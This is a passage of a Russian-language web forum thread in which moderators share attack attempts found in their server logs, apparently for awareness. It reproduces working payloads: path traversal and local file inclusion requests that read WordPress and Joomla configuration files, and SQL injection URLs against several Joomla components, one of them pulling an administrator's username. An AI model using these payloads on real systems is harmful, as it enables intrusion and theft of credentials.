- Сообщений: 986
- Спасибо получено: 146
Как создать и настроить свой веб-сервер на VDS (05 сен 2024)
Осенью самое время заняться установкой и тюнингом своего веб-сервера. Не правда ли?
Как взламывали Masterpro.ws
- serge
- Не в сети
- Модератор
Less
Больше
9 года 8 мес. назад #21
от serge
А я смогу! - А поглядим! - А я упрямый!
serge ответил в теме Как взламывали Masterpro.ws
Не встречал раньше атак на это расширение, взгляните. Что-то новое:
Насколько знаю, Revolution Slider Plugin - одно из расширений WordPress.
Code:
public_html/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Насколько знаю, Revolution Slider Plugin - одно из расширений WordPress.
А я смогу! - А поглядим! - А я упрямый!
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- serge
- Не в сети
- Модератор
Less
Больше
- Сообщений: 986
- Спасибо получено: 146
9 года 5 мес. назад #22
от serge
А я смогу! - А поглядим! - А я упрямый!
serge ответил в теме Как взламывали Masterpro.ws
Продолжаем публиковать варианты разнообразных атак, почерпнутых из логов сервера. Возможно, для кого-то это окажется познавательно, а для кого-то и поучительно. Взгляните, это уже попытка SQL-инъекции:
Code:
http://*************.ru/system/southidceditor//upload.asp?action=save&type=IMAGE&style=standard%27%20and%201=2%20union%20select%20S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20%5BS_ImageExt%5D%2b%27%7Ccer%7Caspx%7Ccdx%7Casp%7Casaspp%27,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord%20from%20ewebeditor_style%20where%20s_name=%27standard%27%20and%27a%27=%27a
А я смогу! - А поглядим! - А я упрямый!
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- Aleksej
- Автор темы
- Не в сети
- Модератор
8 года 11 мес. назад - 8 года 11 мес. назад #23
от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Новая порция сценариев атак, целью которых теперь являются, как видите, RSGallery, Idoblog и Jomtube:
Помимо этого, возможно, будет интересно увидеть попытку использования совсем нового эксплоита, по ссылке .
Code:
http://vash_site.ru/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--&limitstart=15
http://vash_site.ru/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--
http://vash_site.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453%20--%20;&option=com_jomtube
Помимо этого, возможно, будет интересно увидеть попытку использования совсем нового эксплоита, по ссылке .
Последнее редактирование: 8 года 11 мес. назад пользователем Aleksej.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- serge
- Не в сети
- Модератор
Less
Больше
- Сообщений: 986
- Спасибо получено: 146
8 года 11 мес. назад #24
от serge
А я смогу! - А поглядим! - А я упрямый!
serge ответил в теме Как взламывали Masterpro.ws
Простенькая попытка локального включения файла: атака на hdflvplayer:
Code:
http://vash_site.ru/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php
А я смогу! - А поглядим! - А я упрямый!
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- Aleksej
- Автор темы
- Не в сети
- Модератор
8 года 11 мес. назад #25
от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Рассматривая логи, вполне реально выявить наиболее уязвимые, или, сформулируем это так, наиболее часто атакуемые расширения. Попытка SQL инъекции, атака на Easybook:
Code:
http://vash_site.ru/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- serge
- Не в сети
- Модератор
Less
Больше
- Сообщений: 986
- Спасибо получено: 146
8 года 2 мес. назад #26
от serge
А я смогу! - А поглядим! - А я упрямый!
serge ответил в теме Как взламывали Masterpro.ws
Попытка SQL инъекции, используя уязвимость компонента июня 2016 года; Joomla BT Media (com_bt_media) Component - SQL Injection:
Code:
Страница: index.php?option=com_bt_media&view=list&categories[0]=1)+AND+(SELECT+1125+FROM(SELECT+COUNT(*),CONCAT(0x5f,0x7e,0x5f,(select+left(uu.username,100)+from+%23__users+as+uu+inner+join+%23__user_usergroup_map+as+uum+on+uu.id+=+uum.user_id+where+uum.group_id=8+limit+1),0x5f,0x7e,0x5f,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+(9320=9320
Code:
URI: option=com_bt_media&view=list&categories[0]=1) AND (SELECT 1125 FROM(SELECT COUNT(*),CONCAT(0x5f,0x7e,0x5f,(select left(uu.username,100) from #__users as uu inner join #__user_usergroup_map as uum on uu.id = uum.user_id where uum.group_id=8 limit 1),0x5f,0x7e,0x5f,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9320=9320
А я смогу! - А поглядим! - А я упрямый!
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.